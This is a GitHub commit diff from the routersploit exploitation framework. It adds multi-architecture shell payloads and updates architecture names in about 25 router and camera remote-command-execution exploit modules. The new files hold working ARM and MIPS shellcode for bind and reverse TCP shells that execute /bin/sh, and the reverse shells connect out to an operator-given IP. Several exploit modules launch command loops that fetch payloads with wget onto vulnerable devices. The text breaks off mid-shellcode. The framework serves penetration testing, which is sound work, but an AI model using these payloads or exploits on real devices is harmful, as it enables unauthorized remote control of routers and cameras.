Skip to content

R
routersploit
Commit 1d37006f by Marcin Bury Committed by GitHub
Options

Payloads (#322) 

* Multiple payloads support

* RHost for bind shell

* Fixing payloads

* Validating parameters

* Architecture parameter

* Fixing payloads

* Fix pep

* Fixing tests

* Fixing ident
parent 592ff649
Showing with 758 additions and 377 deletions
routersploit/__init__.py
...@@ -17,6 +17,8 @@ from routersploit.utils import ( ...@@ -17,6 +17,8 @@ from routersploit.utils import (
) )
from routersploit import exploits from routersploit import exploits
from routersploit import payloads
from routersploit import wordlists from routersploit import wordlists
from routersploit import validators from routersploit import validators
from routersploit.shell import shell from routersploit.shell import shell
routersploit/exploits.py
...@@ -74,7 +74,7 @@ class Exploit(object): ...@@ -74,7 +74,7 @@ class Exploit(object):
""" Base class for exploits. """ """ Base class for exploits. """
__metaclass__ = ExploitOptionsAggregator __metaclass__ = ExploitOptionsAggregator
target = Option(default="", description="Target IP address.") # target = Option(default="", description="Target IP address.")
# port = Option(default="", description="Target port.") # port = Option(default="", description="Target port.")
@property @property
......
routersploit/modules/exploits/cameras/multi/P2P_wificam_rce.py
...@@ -1296,7 +1296,7 @@ class Exploit(exploits.Exploit): ...@@ -1296,7 +1296,7 @@ class Exploit(exploits.Exploit):
print_success("Target is vulnerable") print_success("Target is vulnerable")
print_status("Invoking command loop...") print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available. Use reverse_tcp <reverse ip> <port>") print_status("It is blind command injection - response is not available. Use reverse_tcp <reverse ip> <port>")
shell(self, architecture="mips", method="wget", binary="wget", location="/tmp") shell(self, architecture="mipsbe", method="wget", binary="wget", location="/tmp")
else: else:
print_error("Exploit failed. Device seems to be not vulnerable.") print_error("Exploit failed. Device seems to be not vulnerable.")
......
routersploit/modules/exploits/misc/asus/b1m_projector_rce.py
...@@ -38,7 +38,7 @@ class Exploit(exploits.Exploit): ...@@ -38,7 +38,7 @@ class Exploit(exploits.Exploit):
if self.check(): if self.check():
print_success("Target is vulnerable") print_success("Target is vulnerable")
print_status("Invoking command loop...") print_status("Invoking command loop...")
shell(self, architecture="mips") shell(self, architecture="mipsbe")
else: else:
print_error("Target is not vulnerable") print_error("Target is not vulnerable")
......
routersploit/modules/exploits/misc/wepresent/wipg1000_rce.py
...@@ -38,7 +38,7 @@ class Exploit(exploits.Exploit): ...@@ -38,7 +38,7 @@ class Exploit(exploits.Exploit):
if self.check(): if self.check():
print_success("Target seems to be vulnerable") print_success("Target seems to be vulnerable")
print_status("This is blind command injection, response is not available") print_status("This is blind command injection, response is not available")
shell(self, architecture="mips", binary="netcat", shell="/bin/sh") shell(self, architecture="mipsbe", binary="netcat", shell="/bin/sh")
else: else:
print_error("Exploit failed - exploit seems to be not vulnerable") print_error("Exploit failed - exploit seems to be not vulnerable")
......
routersploit/modules/exploits/routers/3com/officeconnect_rce.py
...@@ -40,7 +40,7 @@ class Exploit(exploits.Exploit): ...@@ -40,7 +40,7 @@ class Exploit(exploits.Exploit):
print_success("Target is vulnerable") print_success("Target is vulnerable")
print_status("Invoking command loop...") print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available") print_status("It is blind command injection - response is not available")
shell(self, architecture="mips") shell(self, architecture="mipsbe")
else: else:
print_error("Target is not vulnerable") print_error("Target is not vulnerable")
......
routersploit/modules/exploits/routers/asmax/ar_804_gu_rce.py
...@@ -41,7 +41,7 @@ class Exploit(exploits.Exploit): ...@@ -41,7 +41,7 @@ class Exploit(exploits.Exploit):
if self.check(): if self.check():
print_success("Target is vulnerable") print_success("Target is vulnerable")
print_status("Invoking command loop...") print_status("Invoking command loop...")
shell(self, architecture="mips") shell(self, architecture="mipsbe")
else: else:
print_error("Exploit failed - target seems to be not vulnerable") print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/asus/infosvr_backdoor_rce.py
...@@ -54,7 +54,7 @@ class Exploit(exploits.Exploit): ...@@ -54,7 +54,7 @@ class Exploit(exploits.Exploit):
print_status("Invoking command loop...") print_status("Invoking command loop...")
print_status("Please note that only first 256 characters of the " print_status("Please note that only first 256 characters of the "
"output will be displayed or use reverse_tcp") "output will be displayed or use reverse_tcp")
shell(self, architecture="arm", method="wget", binary="wget", location="/tmp") shell(self, architecture="armle", method="wget", binary="wget", location="/tmp")
else: else:
print_error("Target is not vulnerable") print_error("Target is not vulnerable")
except socket.error as ex: except socket.error as ex:
......
routersploit/modules/exploits/routers/belkin/n750_rce.py
...@@ -40,7 +40,7 @@ class Exploit(exploits.Exploit): ...@@ -40,7 +40,7 @@ class Exploit(exploits.Exploit):
if self.check(): if self.check():
print_success("Target is vulnerable") print_success("Target is vulnerable")
print_status("Invoking command loop...") print_status("Invoking command loop...")
shell(self, architecture="mips") shell(self, architecture="mipsbe")
else: else:
print_error("Target is not vulnerable") print_error("Target is not vulnerable")
......
routersploit/modules/exploits/routers/bhu/bhu_urouter_rce.py
...@@ -40,7 +40,7 @@ class Exploit(exploits.Exploit): ...@@ -40,7 +40,7 @@ class Exploit(exploits.Exploit):
print_status('\t- Inject "CMD &gt; /usr/share/www/routersploit.check"') print_status('\t- Inject "CMD &gt; /usr/share/www/routersploit.check"')
print_status('\t- The result of CMD will be available at {}:{}/routersploit.check'.format(self.target, self.port)) print_status('\t- The result of CMD will be available at {}:{}/routersploit.check'.format(self.target, self.port))
print_status("Invoking command loop (type 'exit' or 'quit' to exit the loop)...") print_status("Invoking command loop (type 'exit' or 'quit' to exit the loop)...")
shell(self, architecture='mips') shell(self, architecture="mipsbe")
else: else:
print_error('Target is not vulnerable') print_error('Target is not vulnerable')
......
routersploit/modules/exploits/routers/dlink/dcs_930l_auth_rce.py
...@@ -40,7 +40,7 @@ class Exploit(exploits.Exploit): ...@@ -40,7 +40,7 @@ class Exploit(exploits.Exploit):
print_success("Target is vulnerable") print_success("Target is vulnerable")
print_status("Invoking command loop...") print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available") print_status("It is blind command injection, response is not available")
shell(self, architecture="mipsel") shell(self, architecture="mipsle")
else: else:
print_error("Exploit failed - target seems to be not vulnerable") print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py
...@@ -41,7 +41,7 @@ class Exploit(exploits.Exploit): ...@@ -41,7 +41,7 @@ class Exploit(exploits.Exploit):
print_success("Target seems to be vulnerable") print_success("Target seems to be vulnerable")
print_status("Invoking command loop...") print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available") print_status("It is blind command injection, response is not available")
shell(self, architecture="mipsel") shell(self, architecture="mipsle")
else: else:
print_error("Exploit failed - target seems to be not vulnerable") print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/dlink/dir_645_815_rce.py
...@@ -46,7 +46,7 @@ class Exploit(exploits.Exploit): ...@@ -46,7 +46,7 @@ class Exploit(exploits.Exploit):
print_success("Target is vulnerable") print_success("Target is vulnerable")
print_status("Invoking command loop...") print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available") print_status("It is blind command injection, response is not available")
shell(self, architecture="mipsel", method="echo", binary="echo", location="/var/tmp/") shell(self, architecture="mipsle", method="echo", binary="echo", location="/var/tmp/")
else: else:
print_error("Exploit failed - target seems to be not vulnerable") print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py
...@@ -35,7 +35,7 @@ class Exploit(exploits.Exploit): ...@@ -35,7 +35,7 @@ class Exploit(exploits.Exploit):
print_status("It's not possible to check if the target is vulnerable. Try to use following command loop.") print_status("It's not possible to check if the target is vulnerable. Try to use following command loop.")
print_status("Invoking command loop...") print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available") print_status("It is blind command injection, response is not available")
shell(self, architecture="mipsel") shell(self, architecture="mipsle")
def execute(self, cmd): def execute(self, cmd):
buf = ('M-SEARCH * HTTP/1.1\r\n' buf = ('M-SEARCH * HTTP/1.1\r\n'
......
routersploit/modules/exploits/routers/dlink/dsp_w110_rce.py
...@@ -39,7 +39,7 @@ class Exploit(exploits.Exploit): ...@@ -39,7 +39,7 @@ class Exploit(exploits.Exploit):
print_status("Invoking command loop...") print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available.") print_status("It is blind command injection, response is not available.")
print_status("Spawn root shell with telnetd -l/bin/sh") print_status("Spawn root shell with telnetd -l/bin/sh")
shell(self, architecture="mips") shell(self, architecture="mipsbe")
else: else:
print_error("Exploit failed - target seems to be not vulnerable") print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/dlink/multi_hnap_rce.py
...@@ -52,7 +52,7 @@ class Exploit(exploits.Exploit): ...@@ -52,7 +52,7 @@ class Exploit(exploits.Exploit):
print_status("Target might be vulnerable - it is hard to verify") print_status("Target might be vulnerable - it is hard to verify")
print_status("Invoking command loop...") print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available") print_status("It is blind command injection, response is not available")
shell(self, architecture="mipsel") shell(self, architecture="mipsle")
else: else:
print_error("Exploit failed - target seems to be not vulnerable") print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/linksys/wrt100_110_rce.py
...@@ -47,7 +47,7 @@ class Exploit(exploits.Exploit): ...@@ -47,7 +47,7 @@ class Exploit(exploits.Exploit):
if self.test_auth(): if self.test_auth():
print_status("Invoking command loop...") print_status("Invoking command loop...")
print_status("This is blind command injection. Response is not available.") print_status("This is blind command injection. Response is not available.")
shell(self, architecture="mipsel") shell(self, architecture="mipsle")
else: else:
print_error("Target is not vulnerable") print_error("Target is not vulnerable")
......
routersploit/modules/exploits/routers/netcore/udp_53413_rce.py
...@@ -38,7 +38,7 @@ class Exploit(exploits.Exploit): ...@@ -38,7 +38,7 @@ class Exploit(exploits.Exploit):
if self.check(): if self.check():
print_success("Target is vulnerable") print_success("Target is vulnerable")
print_status("Invoking command loop...") print_status("Invoking command loop...")
shell(self, architecture="mipsel", method="wget", binary="wget", location="/var") shell(self, architecture="mipsle", method="wget", binary="wget", location="/var")
else: else:
print_error("Target is not vulnerable") print_error("Target is not vulnerable")
......
routersploit/modules/exploits/routers/netgear/dgn2200_dnslookup_cgi_rce.py
...@@ -41,7 +41,7 @@ class Exploit(exploits.Exploit): ...@@ -41,7 +41,7 @@ class Exploit(exploits.Exploit):
print_status("It is not possible to check if target is vulnerable") print_status("It is not possible to check if target is vulnerable")
print_status("Trying to invoke command loop...") print_status("Trying to invoke command loop...")
print_status("It is blind command injection. Response is not available.") print_status("It is blind command injection. Response is not available.")
shell(self, architecture="mips") shell(self, architecture="mipsbe")
def execute(self, cmd): def execute(self, cmd):
url = "{}:{}/dnslookup.cgi".format(self.target, self.port) url = "{}:{}/dnslookup.cgi".format(self.target, self.port)
......
routersploit/modules/exploits/routers/netgear/dgn2200_ping_cgi_rce.py
...@@ -47,7 +47,7 @@ class Exploit(exploits.Exploit): ...@@ -47,7 +47,7 @@ class Exploit(exploits.Exploit):
if self.check(): if self.check():
print_success("Target is vulnerable") print_success("Target is vulnerable")
print_status("Invoking command loop...") print_status("Invoking command loop...")
shell(self, architecture="mips") shell(self, architecture="mipsbe")
else: else:
print_error("Target is not vulnerable") print_error("Target is not vulnerable")
......
routersploit/modules/exploits/routers/netgear/multi_rce.py
...@@ -60,9 +60,9 @@ class Exploit(exploits.Exploit): ...@@ -60,9 +60,9 @@ class Exploit(exploits.Exploit):
print_status("It is blind command injection - response is not available. Use reverse_tcp <reverse ip> <port>") print_status("It is blind command injection - response is not available. Use reverse_tcp <reverse ip> <port>")
if self.arch == "mipsbe": if self.arch == "mipsbe":
shell(self, architecture="mips", method="wget", binary="wget", location="/tmp") shell(self, architecture="mipsbe", method="wget", binary="wget", location="/tmp")
elif self.arch == "mipsle": elif self.arch == "mipsle":
shell(self, architecture="mipsel", method="wget", binary="wget", location="/tmp") shell(self, architecture="mipsle", method="wget", binary="wget", location="/tmp")
else: else:
print_error("Target is not vulnerable") print_error("Target is not vulnerable")
......
routersploit/modules/exploits/routers/netgear/r7000_r6400_rce.py
...@@ -48,7 +48,7 @@ class Exploit(exploits.Exploit): ...@@ -48,7 +48,7 @@ class Exploit(exploits.Exploit):
print_success("Target is probably vulnerable") print_success("Target is probably vulnerable")
print_status("Invoking command loop...") print_status("Invoking command loop...")
print_status("It is blind command injection. Try to start telnet with telnet telnetd -p '4445'") print_status("It is blind command injection. Try to start telnet with telnet telnetd -p '4445'")
shell(self, architecture="arm") shell(self, architecture="armle")
else: else:
print_error("Target is not vulnerable") print_error("Target is not vulnerable")
......
routersploit/modules/exploits/routers/netsys/multi_rce.py
...@@ -46,7 +46,7 @@ class Exploit(exploits.Exploit): ...@@ -46,7 +46,7 @@ class Exploit(exploits.Exploit):
if self.check(): if self.check():
print_success("Target seems to be vulnerable") print_success("Target seems to be vulnerable")
print_status("Invoking command loop...") print_status("Invoking command loop...")
shell(self, architecture="mipsel") shell(self, architecture="mipsle")
else: else:
print_error("Exploit failed - target seems to be not vulnerable") print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/tplink/archer_c2_c20i_rce.py
...@@ -43,7 +43,7 @@ class Exploit(exploits.Exploit): ...@@ -43,7 +43,7 @@ class Exploit(exploits.Exploit):
print_status("It is blind command injection so response is not available") print_status("It is blind command injection so response is not available")
# requires testing # requires testing
shell(self, architecture="mips", method="wget", binary="wget", location="/tmp") shell(self, architecture="mipsbe", method="wget", binary="wget", location="/tmp")
else: else:
print_error("Exploit failed - target seems to be not vulnerable") print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/zte/zxv10_rce.py
...@@ -50,7 +50,7 @@ class Exploit(exploits.Exploit): ...@@ -50,7 +50,7 @@ class Exploit(exploits.Exploit):
self.info() self.info()
print_status("Invoking command loop") print_status("Invoking command loop")
shell(self, architecture="mips", method="wget", binary="wget", location="/tmp") shell(self, architecture="mipsbe", method="wget", binary="wget", location="/tmp")
else: else:
print_error("Exploit failed - target seems to be not vulnerable") print_error("Exploit failed - target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/zyxel/d1000_rce.py
...@@ -41,7 +41,7 @@ class Exploit(exploits.Exploit): ...@@ -41,7 +41,7 @@ class Exploit(exploits.Exploit):
print_success("Target appears to be vulnerable") print_success("Target appears to be vulnerable")
print_status("Invoking command loop...") print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available") print_status("It is blind command injection - response is not available")
shell(self, architecture="mips") shell(self, architecture="mipsbe")
else: else:
print_error("Target seems to be not vulnerable") print_error("Target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/zyxel/p660hn-t_v1_rce.py
...@@ -33,15 +33,15 @@ class Exploit(exploits.Exploit): ...@@ -33,15 +33,15 @@ class Exploit(exploits.Exploit):
], ],
} }
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target port') # default port port = exploits.Option(80, 'Target port', validators=validators.integer)
def run(self): def run(self):
if self.check(): if self.check():
print_success("Target appears to be vulnerable") print_success("Target appears to be vulnerable")
print_status("Invoking command loop...") print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available") print_status("It is blind command injection - response is not available")
shell(self, architecture="mips") shell(self, architecture="mipsbe")
else: else:
print_error("Target seems to be not vulnerable") print_error("Target seems to be not vulnerable")
......
routersploit/modules/exploits/routers/zyxel/p660hn-t_v2_rce.py
...@@ -48,7 +48,7 @@ class Exploit(exploits.Exploit): ...@@ -48,7 +48,7 @@ class Exploit(exploits.Exploit):
print_success("Target appears to be vulnerable") print_success("Target appears to be vulnerable")
print_status("Invoking command loop...") print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available. Command length up to 28 characters.") print_status("It is blind command injection - response is not available. Command length up to 28 characters.")
shell(self, architecture="mips") shell(self, architecture="mipsbe")
else: else:
print_error("Target seems to be not vulnerable") print_error("Target seems to be not vulnerable")
......
routersploit/modules/payloads/__init__.py 0 → 100644
from . import armle_bind_tcp
from . import armle_reverse_tcp
from . import mipsbe_bind_tcp
from . import mipsbe_reverse_tcp
from . import mipsle_bind_tcp
from . import mipsle_reverse_tcp
routersploit/modules/payloads/armle_bind_tcp.py 0 → 100644
from routersploit import (
exploits,
payloads,
validators
)
class Exploit(payloads.Payload):
__info__ = {
'name': 'ARMLE Bind TCP',
'authors': [
],
'description': '',
'references': [
],
'devices': [
],
}
architecture = "armle"
port = exploits.Option(5555, 'Bind Port', validators=validators.integer)
def generate(self):
bind_port = self.convert_port(self.port)
self.payload = (
"\x02\x00\xa0\xe3" +
"\x01\x10\xa0\xe3" +
"\x06\x20\xa0\xe3" +
"\x07\x00\x2d\xe9" +
"\x01\x00\xa0\xe3" +
"\x0d\x10\xa0\xe1" +
"\x66\x00\x90\xef" +
"\x0c\xd0\x8d\xe2" +
"\x00\x60\xa0\xe1" +
bind_port[1] + "\x10\xa0\xe3" +
bind_port[0] + "\x70\xa0\xe3" +
"\x01\x1c\xa0\xe1" +
"\x07\x18\x81\xe0" +
"\x02\x10\x81\xe2" +
"\x02\x20\x42\xe0" +
"\x06\x00\x2d\xe9" +
"\x0d\x10\xa0\xe1" +
"\x10\x20\xa0\xe3" +
"\x07\x00\x2d\xe9" +
"\x02\x00\xa0\xe3" +
"\x0d\x10\xa0\xe1" +
"\x66\x00\x90\xef" +
"\x14\xd0\x8d\xe2" +
"\x06\x00\xa0\xe1" +
"\x03\x00\x2d\xe9" +
"\x04\x00\xa0\xe3" +
"\x0d\x10\xa0\xe1" +
"\x66\x00\x90\xef" +
"\x08\xd0\x8d\xe2" +
"\x06\x00\xa0\xe1" +
"\x01\x10\x41\xe0" +
"\x02\x20\x42\xe0" +
"\x07\x00\x2d\xe9" +
"\x05\x00\xa0\xe3" +
"\x0d\x10\xa0\xe1" +
"\x66\x00\x90\xef" +
"\x0c\xd0\x8d\xe2" +
"\x00\x60\xa0\xe1" +
"\x02\x10\xa0\xe3" +
"\x06\x00\xa0\xe1" +
"\x3f\x00\x90\xef" +
"\x01\x10\x51\xe2" +
"\xfb\xff\xff\x5a" +
"\x04\x10\x4d\xe2" +
"\x02\x20\x42\xe0" +
"\x2f\x30\xa0\xe3" +
"\x62\x70\xa0\xe3" +
"\x07\x34\x83\xe0" +
"\x69\x70\xa0\xe3" +
"\x07\x38\x83\xe0" +
"\x6e\x70\xa0\xe3" +
"\x07\x3c\x83\xe0" +
"\x2f\x40\xa0\xe3" +
"\x73\x70\xa0\xe3" +
"\x07\x44\x84\xe0" +
"\x68\x70\xa0\xe3" +
"\x07\x48\x84\xe0" +
"\x73\x50\xa0\xe3" +
"\x68\x70\xa0\xe3" +
"\x07\x54\x85\xe0" +
"\x3e\x00\x2d\xe9" +
"\x08\x00\x8d\xe2" +
"\x00\x10\x8d\xe2" +
"\x04\x20\x8d\xe2" +
"\x0b\x00\x90\xef"
)
routersploit/modules/payloads/armle_reverse_tcp.py 0 → 100644
from routersploit import (
exploits,
payloads,
validators,
)
class Exploit(payloads.Payload):
__info__ = {
'name': 'ARMLE Reverse TCP',
'authors': [
],
'description': '',
'references': [
],
'devices': [
],
}
architecture = "armle"
target = exploits.Option('', 'Reverse IP', validators=validators.ipv4)
port = exploits.Option(5555, 'Reverse TCP Port', validators=validators.integer)
def generate(self):
reverse_ip = self.convert_ip(self.target)
reverse_port = self.convert_port(self.port)
self.payload = (
"\x01\x10\x8F\xE2" +
"\x11\xFF\x2F\xE1" +
"\x02\x20\x01\x21" +
"\x92\x1A\x0F\x02" +
"\x19\x37\x01\xDF" +
"\x06\x1C\x08\xA1" +
"\x10\x22\x02\x37" +
"\x01\xDF\x3F\x27" +
"\x02\x21\x30\x1c" +
"\x01\xdf\x01\x39" +
"\xFB\xD5\x05\xA0" +
"\x92\x1a\x05\xb4" +
"\x69\x46\x0b\x27" +
"\x01\xDF\xC0\x46" +
"\x02\x00" + reverse_port + # "\x12\x34" struct sockaddr and port
reverse_ip + # reverse ip address
"\x2f\x62\x69\x6e" + # /bin
"\x2f\x73\x68\x00" # /sh\0
)
routersploit/modules/payloads/mipsbe_bind_tcp.py 0 → 100644
from routersploit import (
exploits,
payloads,
validators
)
class Exploit(payloads.Payload):
__info__ = {
'name': 'MIPSBE Bind TCP',
'authors': [
],
'description': '',
'references': [
],
'devices': [
],
}
architecture = "mipsbe"
port = exploits.Option(5555, 'Bind Port', validators=validators.integer)
def generate(self):
bind_port = self.convert_port(self.port)
self.payload = (
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
"\x27\xbd\xff\xe0" + # addiu sp,sp,-32
"\x24\x0e\xff\xfd" + # li t6,-3
"\x01\xc0\x20\x27" + # nor a0,t6,zero
"\x01\xc0\x28\x27" + # nor a1,t6,zero
"\x28\x06\xff\xff" + # slti a2,zero,-1
"\x24\x02\x10\x57" + # li v0,4183 ( __NR_socket )
"\x01\x01\x01\x0c" + # syscall
# bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
"\x30\x50\xff\xff" + # andi s0,v0,0xffff
"\x24\x0e\xff\xef" + # li t6,-17 ; t6: 0xffffffef
"\x01\xc0\x70\x27" + # nor t6,t6,zero ; t6: 0x10 (16)
"\x24\x0d\xff\xfd" + # li t5,-3 ; t5: -3
"\x01\xa0\x68\x27" + # nor t5,t5,zero ; t5: 0x2
"\x01\xcd\x68\x04" + # sllv t5,t5,t6 ; t5: 0x00020000
"\x24\x0e" + bind_port + # li t6,0xFFFF (port) ; t6: 0x115c (4444 (default LPORT))
"\x01\xae\x68\x25" + # or t5,t5,t6 ; t5: 0x0002115c
"\xaf\xad\xff\xe0" + # sw t5,-32(sp)
"\xaf\xa0\xff\xe4" + # sw zero,-28(sp)
"\xaf\xa0\xff\xe8" + # sw zero,-24(sp)
"\xaf\xa0\xff\xec" + # sw zero,-20(sp)
"\x02\x10\x20\x25" + # or a0,s0,s0
"\x24\x0e\xff\xef" + # li t6,-17
"\x01\xc0\x30\x27" + # nor a2,t6,zero
"\x23\xa5\xff\xe0" + # addi a1,sp,-32
"\x24\x02\x10\x49" + # li v0,4169 ( __NR_bind )A
"\x01\x01\x01\x0c" + # syscall
# listen(3, 257) = 0
"\x02\x10\x20\x25" + # or a0,s0,s0
"\x24\x05\x01\x01" + # li a1,257
"\x24\x02\x10\x4e" + # li v0,4174 ( __NR_listen )
"\x01\x01\x01\x0c" + # syscall
# accept(3, 0, NULL) = 4
"\x02\x10\x20\x25" + # or a0,s0,s0
"\x28\x05\xff\xff" + # slti a1,zero,-1
"\x28\x06\xff\xff" + # slti a2,zero,-1
"\x24\x02\x10\x48" + # li v0,4168 ( __NR_accept )
"\x01\x01\x01\x0c" + # syscall
# dup2(4, 2) = 2
# dup2(4, 1) = 1
# dup2(4, 0) = 0
"\xaf\xa2\xff\xff" + # sw v0,-1(sp) # socket
"\x24\x11\xff\xfd" + # li s1,-3
"\x02\x20\x88\x27" + # nor s1,s1,zero
"\x8f\xa4\xff\xff" + # lw a0,-1(sp)
"\x02\x20\x28\x21" + # move a1,s1 # dup2_loop
"\x24\x02\x0f\xdf" + # li v0,4063 ( __NR_dup2 )
"\x01\x01\x01\x0c" + # syscall 0x40404
"\x24\x10\xff\xff" + # li s0,-1
"\x22\x31\xff\xff" + # addi s1,s1,-1
"\x16\x30\xff\xfa" + # bne s1,s0 <dup2_loop>
# execve("//bin/sh", ["//bin/sh"], [/* 0 vars */]) = 0
"\x28\x06\xff\xff" + # slti a2,zero,-1
"\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f "//"
"\x35\xef\x62\x69" + # ori t7,t7,0x6269 "bi"
"\xaf\xaf\xff\xec" + # sw t7,-20(sp)
"\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f "n/"
"\x35\xce\x73\x68" + # ori t6,t6,0x7368 "sh"
"\xaf\xae\xff\xf0" + # sw t6,-16(sp)
"\xaf\xa0\xff\xf4" + # sw zero,-12(sp)
"\x27\xa4\xff\xec" + # addiu a0,sp,-20
"\xaf\xa4\xff\xf8" + # sw a0,-8(sp)
"\xaf\xa0\xff\xfc" + # sw zero,-4(sp)
"\x27\xa5\xff\xf8" + # addiu a1,sp,-8
"\x24\x02\x0f\xab" + # li v0,4011 ( __NR_execve )
"\x01\x01\x01\x0c" # syscall 0x40404
)
routersploit/modules/payloads/mipsbe_reverse_tcp.py 0 → 100644
from routersploit import (
exploits,
payloads,
validators,
)
class Exploit(payloads.Payload):
__info__ = {
'name': 'MIPSBE Reverse TCP',
'authors': [
],
'description': '',
'references': [
],
'devices': [
],
}
architecture = "mipsbe"
target = exploits.Option('', 'Reverse IP', validators=validators.ipv4)
port = exploits.Option(5555, 'Reverse TCP Port', validators=validators.integer)
def generate(self):
reverse_ip = self.convert_ip(self.target)
reverse_port = self.convert_port(self.port)
self.payload = (
"\x28\x04\xff\xff" + # slti a0,zero,-1
"\x24\x02\x0f\xa6" + # li v0,4006
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x28\x04\x11\x11" + # slti a0,zero,4369
"\x24\x02\x0f\xa6" + # li v0,4006
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x24\x0c\xff\xfd" + # li t4,-3
"\x01\x80\x20\x27" + # nor a0,t4,zero
"\x24\x02\x0f\xa6" + # li v0,4006
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x24\x0c\xff\xfd" + # li t4,-3
"\x01\x80\x20\x27" + # nor a0,t4,zero
"\x01\x80\x28\x27" + # nor a1,t4,zero
"\x28\x06\xff\xff" + # slti a2,zero,-1
"\x24\x02\x10\x57" + # li v0,4183
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x30\x44\xff\xff" + # andi a0,v0,0xffff
"\x24\x02\x0f\xc9" + # li v0,4041
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x24\x02\x0f\xc9" + # li v0,4041
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x3c\x05\x00\x02" + # lui a1,0x2
"\x34\xa5" + reverse_port + # "\x7a\x69" # ori a1,a1,0x7a69
"\xaf\xa5\xff\xf8" + # sw a1,-8(sp)
"\x3c\x05" + reverse_ip[:2] + # "\xc0\xa8" # lui a1,0xc0a8
"\x34\xa5" + reverse_ip[2:] + # "\x01\x37" # ori a1,a1,0x137
"\xaf\xa5\xff\xfc" + # sw a1,-4(sp)
"\x23\xa5\xff\xf8" + # addi a1,sp,-8
"\x24\x0c\xff\xef" + # li t4,-17
"\x01\x80\x30\x27" + # nor a2,t4,zero
"\x24\x02\x10\x4a" + # li v0,4170
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x3c\x08\x2f\x2f" + # lui t0,0x2f2f
"\x35\x08\x62\x69" + # ori t0,t0,0x6269
"\xaf\xa8\xff\xec" + # sw t0,-20(sp)
"\x3c\x08\x6e\x2f" + # lui t0,0x6e2f
"\x35\x08\x73\x68" + # ori t0,t0,0x7368
"\xaf\xa8\xff\xf0" + # sw t0,-16(sp)
"\x28\x07\xff\xff" + # slti a3,zero,-1
"\xaf\xa7\xff\xf4" + # sw a3,-12(sp)
"\xaf\xa7\xff\xfc" + # sw a3,-4(sp)
"\x23\xa4\xff\xec" + # addi a0,sp,-20
"\x23\xa8\xff\xec" + # addi t0,sp,-20
"\xaf\xa8\xff\xf8" + # sw t0,-8(sp)
"\x23\xa5\xff\xf8" + # addi a1,sp,-8
"\x27\xbd\xff\xec" + # addiu sp,sp,-20
"\x28\x06\xff\xff" + # slti a2,zero,-1
"\x24\x02\x0f\xab" + # li v0,4011
"\x00\x90\x93\x4c" # syscall 0x2424d
)
routersploit/modules/payloads/mipsle_bind_tcp.py 0 → 100644
from routersploit import (
exploits,
payloads,
validators,
)
class Exploit(payloads.Payload):
__info__ = {
'name': 'MIPSLE Bind TCP',
'authors': [
],
'description': '',
'references': [
],
'devices': [
],
}
architecture = "mipsle"
port = exploits.Option(5555, 'Bind Port', validators=validators.integer)
def generate(self):
bind_port = self.convert_port(self.port)
self.payload = (
"\xe0\xff\xbd\x27" + # addiu sp,sp,-32
"\xfd\xff\x0e\x24" + # li t6,-3
"\x27\x20\xc0\x01" + # nor a0,t6,zero
"\x27\x28\xc0\x01" + # nor a1,t6,zero
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\x57\x10\x02\x24" + # li v0,4183 ( __NR_socket )
"\x0c\x01\x01\x01" + # syscall
"\xff\xff\x50\x30" + # andi s0,v0,0xffff
"\xef\xff\x0e\x24" + # li t6,-17 ; t6: 0xffffffef
"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x10 (16)
bind_port + "\x0d\x24" + # li t5,0xFFFF (port) ; t5: 0x5c11 (0x115c == 4444 (default LPORT))
"\x04\x68\xcd\x01" + # sllv t5,t5,t6 ; t5: 0x5c110000
"\xfd\xff\x0e\x24" + # li t6,-3 ; t6: -3
"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x2
"\x25\x68\xae\x01" + # or t5,t5,t6 ; t5: 0x5c110002
"\xe0\xff\xad\xaf" + # sw t5,-32(sp)
"\xe4\xff\xa0\xaf" + # sw zero,-28(sp)
"\xe8\xff\xa0\xaf" + # sw zero,-24(sp)
"\xec\xff\xa0\xaf" + # sw zero,-20(sp)
"\x25\x20\x10\x02" + # or a0,s0,s0
"\xef\xff\x0e\x24" + # li t6,-17
"\x27\x30\xc0\x01" + # nor a2,t6,zero
"\xe0\xff\xa5\x23" + # addi a1,sp,-32
"\x49\x10\x02\x24" + # li v0,4169 ( __NR_bind )A
"\x0c\x01\x01\x01" + # syscall
"\x25\x20\x10\x02" + # or a0,s0,s0
"\x01\x01\x05\x24" + # li a1,257
